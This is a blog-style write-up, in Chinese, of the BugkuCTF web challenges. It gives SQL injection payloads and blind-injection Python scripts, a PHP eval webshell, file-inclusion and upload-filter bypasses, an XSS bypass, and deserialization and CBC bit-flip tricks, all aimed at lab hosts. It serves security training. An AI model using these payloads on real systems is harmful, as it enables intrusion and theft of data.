BUGKUctf-web-writeup

因为是利用word直接转换的，所以排版有点乱，找到了原有word，用markdown重写了遍。
地址在：http://www.zhengjim.com/2019/05/11/166.html

找到了个ctf平台。里面的web挺多的。终于将web题目写的差不多了。

Web

签到题

加群就可以了

Web2

直接F12就看到了

文件上传测试

Burp抓包
文件名改成 1.jpg.php 即可

计算题

F12 改长度限制即可

Web3

阻止一直弹框，然后源代码

解码下就可以了

Sql注入

右键源代码，看到gb2312 易想到宽字节注入

爆出数据库：

结合题目，得flag

SQL注入1

Sql语句：$query = "SELECT * FROM temp WHERE id={$id} LIMIT 1";

可以用%00绕过关键字过滤

爆出数据库：

Flag ：

你必须让他停下

Burp抓包

返回的包图片不一样. Intruder 多次试试
随便构造没用的参数发送就行了
根据length 查看就行了

本地包含

源代码

eval存在命令执行漏洞，构造出文件包含

Base64解码即可

后来得知可以这么写。

积累太少。

变量1

源代码

（和“百度杯”CTF比赛（二月场）题目一致）
提示flag在变量里。正则匹配只能大小写字符和数字。 eval("var_dump($$args);");打印出变量的值。 利用超全局数组 GLOBALS 可以打印出所有变量。

Web4

右键源代码 看见了一串js代码 先URL解码

就是拼接 67d709b2b54aa2aa648cf6e87a7114f1 提交

Web5

右键源代码，将JSfuck代码扔进F12控制台

flag在index里

点下链接http://120.24.86.145:8005/post/index.php?file=show.php
发现File参数 易想到文件包含漏洞
PAYLOAD:http://120.24.86.145:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=index.php
Base64解码

phpcmsV9

利用注册页面的漏洞试试能不能getshell。显示操作失败。

所以只能先利用sql注入，注入出后台账号和密码。网上有很多注入exp。

花了一毛解密 a123456
在后台可以直接看到我们在注册页面上传的shell ，原来只是没回显。 菜刀连上去即可

海洋CMS

利用网上已经知道的漏洞。

根据提示，列出目录开始找。

输入密码查看flag

根据提示 用BURP爆破

前女友

点链接看到源代码

利用PHP md5()漏洞与strcmp()漏洞

成绩单

容易看出考SQL注入

爆表：-1' union select 1,table_name,3,4 from information_schema.tables where TABLE_SCHEMA='skctf_flag' LIMIT 0,1
爆字段：-1' union select 1,column_name,3,4 from information_schema.columns where TABLE_SCHEMA='skctf_flag' and table_name='fl4g' LIMIT 0,1#
Flag：-1' union select 1,skctf_flag,3,4 from fl4g#

Web3

Flag base64解码后还有base64的字符 在解码 。 是串数字。根据提示就是要把那串数字POST过去 ，要短时间内。Python脚本：

!usr/bin/env python

!coding=utf-8

author = 'zhengjim'

import requests
import base64

url ='http://120.24.86.145:8002/web6/'

r =requests.session()

headers = r.get(url).headers
key = base64.b64decode(base64.b64decode(headers['flag']).split(':')[1])
data={'margin':key}
print r.post(url=url,data=data).content

cookies欺骗？？

点进来URL
http://120.24.86.145:8002/web11/index.php?line=&filename=a2V5cy50eHQ=
a2V5cy50eHQ=解码是keys.txt 所以替换成base64后的index.php。Line是行数
遍历获得源代码
得到源代码后，看出，构造cookie margin=margin 然后读keys.php即可

xss

过滤<> 用\u003cscript\u003ealert(key)\u003c/script\u003e 可绕过

never give up

发现提示1p.html 访问1p.html后发现了一串WORDS 解码。有串base64解码 。在url解码

直接访问即可（出题人应该是忘记屏蔽了-。-）

正解应该是

welcome to bugkuctf

看源代码：

txt参数的 File_get_contents() 利用php://input 来绕过 file 的include() 文件包含

读出hint.php 解码后：

在读flag.php，结果提示不给flag 于是读下index.php

发现正则匹配file 不能包含flag

看到这段代码及hint.php类有个 __toString()构造函数，可以构造password的序列化。然后反序列读出flag.php文件

login1

根据提示 就是注册一个admin a 的账号
然后就可以重置admin密码，后登入即可。

过狗一句话

看提示 猜测 indexphp 就是shell 于是直接利用

各种绕过哟

根据源代码 GET 一个unname 和POST一个 passwd 值不能相等 sha1要相等 ，提交数组。Sha1()均返回null 绕过

Web8

根据源代码

extract 可以将$_GET数组的值转为变量，默认是如果有冲突，则覆盖已有的变量。
File_get_contents() 利用php://input绕过。

字符？正则？

一步步跟着匹配即可，[:punct:]是匹配任何标点符号

考细心

看主页404，但和真正的404页面不一样，没什么发现，于是试了下robots.txt 发现了resusl.php文件。

本来以为是伪造IP，然后注入得到password，提交。然后均失败了。 试了下?x=admin 出现flag。。。

求getshell

上传题。 各种方法尝试。发现是后缀名黑名单检测和类型检测
php别名：php2, php3, php4, php5, phps, pht, phtm, phtml 均试下。
发现php5绕过
上面的Content-Type的值 大小写绕过

flag.php

点了没反应，提示:hint 多次尝试 发现GET一个hint就有源代码

审计代码，要传一个cookie名为ISecer 的反序列的值。并且反序列后的值要全相等于”$KEY”
这里要注意是有双引号。

而且$KEY的传值的此之后的。所以反序列的值不是’ISecer:www.isecer.com’。
我们要得到的值是string(0) "" 所以序列化该值即可。

Web15

给了源代码
是INSERT INTO的注入，并且不能有’,’否则会吃掉后面的语句
Payload：
11'+(select case when (substring((select flag from flag ) from {0} for 1 )='{1}') then sleep(4) else 1 end ) and '1'='1
Python脚本
import requests
import string
url="http://120.24.86.145:8002/web15/"
allString=string.lowercase + string.uppercase + string.digits
flag=""

for i in range(1,33):
for str1 in allString:
data="11'+(select case when (substring((select flag from flag ) from {0} for 1 )='{1}') then sleep(4) else 1 end ) and '1'='1".format(str(i),str1)
# print data
headers={"x-forwarded-for":data}
try:
res=requests.get(url,headers=headers,timeout=3)
except requests.exceptions.ReadTimeout, e:
flag += str1
print flag
break
print 'flag:' + flag
文件包含2

看见file想到文件包含，php://filter/read=convert.base64-encode/resource=hello.php

失败。
右键源代码，发现有个upload.php上传。所以上传一个带一句话木马的图片包含即可。
‘<?php’ 、 ‘?>’这两个被过滤了。换个姿势上传~
<?=eval($_POST['cmd']);
成功连接

sql注入2

根据题目sql注入 试了好久好久，于是请教他人。。。结果大牛说访问下flag 就行了。巨坑！
wordpress

登入后台。根据这个构造账号密码 sun sun19980321
看到隐藏文章

经人提醒才知道，是数据库
找到http://wp.bugku.com/phpmyadmin/ 登入

Login3

过滤了空格 or and where + * union ,%0a %0b 等等
测试得出用 ^

Payload
import requests
url = 'http://47.93.190.246:49167/index.php'
r = requests.Session()
result = ''
for i in range(1,33):
for j in range(37,127):
payload = "admin1'^(ascii(mid((password)from({0})))>{1})#".format(str(i),str(j))
print payload
data = {"username":payload,"password":"asd"}
html = r.post(url,data=data)
if "password error!" in html.content:
result += chr(j)
print result
break
print result
跑出MD5解密 登入即可

login4

看到登入框就试试有没有注入，源代码泄露。 发现.index.php.swp 存在
恢复成源码。 根据提示，知道了是利用cbc字符翻转攻击。
原理看文章：http://wooyun.jozxing.cc/static/drops/tips-7828.html

首先先post username = ‘qdmin’ password=’1’ 会得到一个iv cipher

利用CBC字节翻转攻击将qdmin 的q 改成 a 后加密得到cipher。

替换cookie[cipher]的值 访问。

反序列化失败。 原因是第一个块数据（16字节）被破坏了。因为要username要等于admin所以不能利用文章里的说的填充字符。 又因为是第一个块数据被破坏，第一个块数据是和IV有关，所以只要将在CBC字符翻转攻击，得到新的IV就可以修复第一块数据。

代入vi即可

转载于:https://www.cnblogs.com/zhengjim/p/6972527.html